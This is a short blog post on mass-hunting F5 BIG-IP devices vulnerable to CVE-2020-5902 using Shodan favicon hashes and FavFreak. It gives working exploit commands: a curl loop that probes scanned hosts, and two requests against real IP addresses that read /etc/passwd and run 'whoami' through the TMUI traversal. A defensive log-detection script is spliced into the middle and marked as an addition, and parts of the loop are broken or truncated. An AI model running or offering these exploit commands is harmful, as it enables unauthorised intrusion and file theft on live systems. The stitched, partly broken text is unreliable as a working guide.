CVE-2020-5902 Mass Hunting with Shodan and FavFreak

Prerequisites:

Tools that need to be installed:

  1. FavFreak
  2. Shodan CLI
  3. Assetfinder
  4. httprobe
git clone https://github.com/devanshbatham/FavFreak
cd FavFreak
pip3 install -r requirements.txt
  1. easy_install shodan
  2. shodan init YOUR_API_KEY
go get -u github.com/tomnomnom/httprobe
assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output --shodan
shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

NOTE: There is a chance of getting false positives, and a higher chance of filing a DUPLICATE REPORT!
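Seen from the defending side, the requests above leave a distinctive trace in a web access log: a `..;/` path segment under `/tmui/`. The following is an added example, not part of the original post, that flags such lines; the combined log format, the constructed sample lines, the function names and the handling of the encoded `%3b` and `%2e` forms are assumptions made here.

```bash
#!/usr/bin/env bash
# Added example: flag access-log lines carrying the "..;/" path segment
# under /tmui/ that the requests above rely on.
# Assumption: Apache/NCSA combined log format.

# Constructed sample lines (documentation-range addresses, not real traffic).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1832 "-" "curl/7.68.0"
203.0.113.9 - - [06/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=whoami HTTP/1.1" 200 41 "-" "curl/7.68.0"
192.0.2.44 - - [06/Jul/2020:10:02:00 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 0 "-" "python-requests/2.24"
198.51.100.7 - - [06/Jul/2020:10:03:00 +0000] "GET /index.html;jsessionid=abc HTTP/1.1" 200 100 "-" "Mozilla/5.0"
EOF
}

# Reads log lines on stdin; prints: <client> <status> <verdict> <path>
detect_tmui_traversal() {
  awk '
  {
    # The first quoted field is the request line: METHOD PATH PROTOCOL
    if (split($0, q, "\"") < 3) next
    split(q[2], req, " ")
    path = tolower(req[2])
    gsub(/%3b/, ";", path)   # encoded semicolon (assumed variant)
    gsub(/%2e/, ".", path)   # encoded dot (assumed variant)
    if (path !~ /^\/tmui\// || path !~ /\.\.;\//) next
    split(q[3], rest, " ")   # rest[1] is the HTTP status code
    # A 200 means the request was answered, not rejected: triage first.
    verdict = (rest[1] == "200") ? "ANSWERED" : "ATTEMPT"
    print $1, rest[1], verdict, req[2]
  }'
}

sample_log | detect_tmui_traversal
```

Feed a real log with `detect_tmui_traversal < access.log`; a match shows only that the request was made, so confirm against the device's patch level before treating it as a compromise.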

Happy Hunting !!

  1. Download Go from the official website: https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
  2. cd /root/Download [ Assuming this is your download location ]
  3. tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
  4. vim ~/.bashrc
  5. export GOPATH=/root/go-workspace
    export GOROOT=/usr/local/go
    PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
  6. source ~/.bashrc

Lazy af :) OSCP — eWPTXv2

Anon Tuttu Venus
